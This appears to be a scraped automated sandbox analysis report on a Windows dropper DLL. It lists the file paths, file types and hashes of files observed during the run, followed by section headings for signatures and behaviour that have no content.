C:\Windows\Installer\MSI8CB0.tmp	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	D82B3FB861129C5D71F0CD2874F97216	F3FE341D79224126E950D2691D574D147102B18D	107B32C5B789BE9893F24D5BFE22633D25B7A3CAE80082EF37B30E056869CC5C
C:\Windows\Installer\MSI931A.tmp	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	D82B3FB861129C5D71F0CD2874F97216	F3FE341D79224126E950D2691D574D147102B18D	107B32C5B789BE9893F24D5BFE22633D25B7A3CAE80082EF37B30E056869CC5C
C:\Windows\Installer\MSIC14D.tmp	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	D82B3FB861129C5D71F0CD2874F97216	F3FE341D79224126E950D2691D574D147102B18D	107B32C5B789BE9893F24D5BFE22633D25B7A3CAE80082EF37B30E056869CC5C
C:\Windows\Installer\MSIECC4.tmp	data	F7DFD568CF3729D83FDBA1E41F1AD915	0BF4E83D1B715E343A422AA7869A5DDAB98E4A5E	01F7E6045FDC40414C558E2EB278E324F0F78816FB84395E0B7C3917E512D54B
C:\Windows\Installer\MSIECF4.tmp	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	D82B3FB861129C5D71F0CD2874F97216	F3FE341D79224126E950D2691D574D147102B18D	107B32C5B789BE9893F24D5BFE22633D25B7A3CAE80082EF37B30E056869CC5C
C:\Windows\Installer\SourceHash{F73CE0E6-78CF-454D-9161-7ECE19A3E9D5}	Composite Document File V2 Document, Cannot read section info	FF0E16AC5B15BF1D034D1842B96CFA2B	DA3E55A5EA9858CF6C1D8882F81DEB86A6EBF715	65C9C0BDAC8131E970E5EDB7374DD6158DFE15F29377DDA0EB33B2B782260D03
C:\Windows\Installer\inprogressinstallinfo.ipi	Composite Document File V2 Document, Cannot read section info	79FDC2FA871A328337D40973ACFA45BB	A2528779DC67989263E43D82CADCB31548603797	968D056BF049EEE0FB924CD5E1713889738F31636DEF80FCE58BAA96D484FA85
C:\Windows\Logs\DPX\setupact.log	CSV text	FB20A76867F724B5BE48D5E6DB145FEB	223A39F1D31D6A4D6950E3BEFB287905ED281304	DFC490139B2F96CFA6AC4CC4C1E7905F5D7AF27A752B7CCDCFC639DDCC9E991C
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0B27D093D08BE0BDBC51C34D3C7764F3	213F51B5573176546FA644B7FD2B1570F1E28B65	AC9B6CEE7D44A5F8473B2580D47471D1E030A539A0B24B352EEBAAB9CA002D8D
C:\Windows\Temp\~DF08EC10C6FA1D2184.TMP	Composite Document File V2 Document, Cannot read section info	54F8A582D743E427013E5F65D884F523	EFC51AE3468C31AFCA8F37497B8032C99587FA16	8E2120485C0E72E87068719E58A152E4B7FFF2160A1568FD58A51E6343EF272B
C:\Windows\Temp\~DF0E992ED88844D6C1.TMP	data	F4AA58FD51631DE88B47605CFB57CEF4	280792C9BA29D2F59B8653CFC356EE895B332959	514ADFF22088F0495591E1EFF6FB3FFE12389F6141D245CABC2D7B094143F9D1
C:\Windows\Temp\~DF17A798673345C078.TMP	data	BF619EAC0CDF3F68D496EA9344137E8B	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
C:\Windows\Temp\~DF25B15AEE30697DAD.TMP	Composite Document File V2 Document, Cannot read section info	640108DDEA1892C7FF242A7F9366159B	C23709AE454F49ED29E558047A351B2E9AC5ED27	A79BA16470481209D892A7643B33B9CD4C0FD49BC1781528D3FB60643C53BFFF
C:\Windows\Temp\~DF36464CBF16E54E06.TMP	data	BF643D7E14CA965EA798494CDC0F626C	93E997D9AB82D947355FF323802BA9C4B70F76A2	5F388D74A9B9826822FBC8EC208BFFC6BD018008F9F58455CA5E82FA33C31438
C:\Windows\Temp\~DF49A8548405E9067B.TMP	Composite Document File V2 Document, Cannot read section info	3599C7C8496CCD3840749408B8713B60	9FA6211DF825F06123469B6250D13651FD1469FB	87E01CE6E19F429DE4372034473C595A0E957DEBDA489BB208AC795787D1DE7D
C:\Windows\Temp\~DF4DE7771CC64A5A9A.TMP	data	BF643D7E14CA965EA798494CDC0F626C	93E997D9AB82D947355FF323802BA9C4B70F76A2	5F388D74A9B9826822FBC8EC208BFFC6BD018008F9F58455CA5E82FA33C31438
C:\Windows\Temp\~DF4F91D2AF9D4E15DB.TMP	Composite Document File V2 Document, Cannot read section info	79FDC2FA871A328337D40973ACFA45BB	A2528779DC67989263E43D82CADCB31548603797	968D056BF049EEE0FB924CD5E1713889738F31636DEF80FCE58BAA96D484FA85
C:\Windows\Temp\~DF62C5956E9BC9E586.TMP	data	BF619EAC0CDF3F68D496EA9344137E8B	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
C:\Windows\Temp\~DF7B2A307C8AA17666.TMP	data	BF643D7E14CA965EA798494CDC0F626C	93E997D9AB82D947355FF323802BA9C4B70F76A2	5F388D74A9B9826822FBC8EC208BFFC6BD018008F9F58455CA5E82FA33C31438
C:\Windows\Temp\~DF83A0503CF199010F.TMP	data	BF619EAC0CDF3F68D496EA9344137E8B	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
C:\Windows\Temp\~DF8F3DF616D8AE56F9.TMP	data	EF4522D1885B646AC9727AA8D0B131E8	225D40AE725B79181FEFBBAB14267584CA07F45B	975A5939961060D8B845E5BCD6C368EC7099E85BF6D0F4929F7D1F3EF49C2B15
C:\Windows\Temp\~DFB2ED7D6DF90FC402.TMP	data	BF619EAC0CDF3F68D496EA9344137E8B	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
C:\Windows\Temp\~DFC0DF350B38604086.TMP	Composite Document File V2 Document, Cannot read section info	2398B7C74144DD275F8BAE17127C3919	899568CF6D12595972FE29DAA915CD76E6A3F573	3CFFE95A241BE16A6C9A6127637DF9EF02272E0583EFE6120C5DE2BFBC5DC917
C:\Windows\Temp\~DFCBACE4E1BA405D3C.TMP	data	BF619EAC0CDF3F68D496EA9344137E8B	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
C:\Windows\Temp\~DFCCBD8EB92D670390.TMP	data	D0C61CB8430CF7563CDEDE8D02528C5D	0E9F87E2844E8F7E0ED4F88E6C332861FC926DB8	0CC3CDA797D3B0DAE95D1427FD20964EE09A613838DB9D28BC23F07CDB4031FA
C:\Windows\Temp\~DFCE0B9ADDDB293763.TMP	Composite Document File V2 Document, Cannot read section info	9C214FE4EDF5B38F26143747773702A7	E3CC00DE1B1A2EB390B8F5CF0C2D6A61B37FA284	58D781367F31D5E14AC171BA4E30C8AA9027A5D4C84E693B062E16092C7D25B8
C:\Windows\Temp\~DFF7B6CD3F78D0E5AF.TMP	data	BF619EAC0CDF3F68D496EA9344137E8B	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
\Device\ConDrv	ASCII text, with CRLF, CR, LF line terminators	0476260F58311DA3D91A2D4B01F52EDF	F5F577AF92B9D71BADAA8F94FFC4B0BA4A58E906	176C191F04FAE9C12DA7C55E3F0E8903AE2E55015EF9C4D9E0428BBE855B1AFF

Windows Analysis Report
SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll

Overview

General Information

Detection

Signatures

Classification

Signatures

Cryptography

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted Domains

Contacted URLs

Windows Analysis Report SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll

Overview

General Information

Detection

Signatures

Classification

Signatures

Cryptography

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted Domains

Contacted URLs

Windows Analysis Report
SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll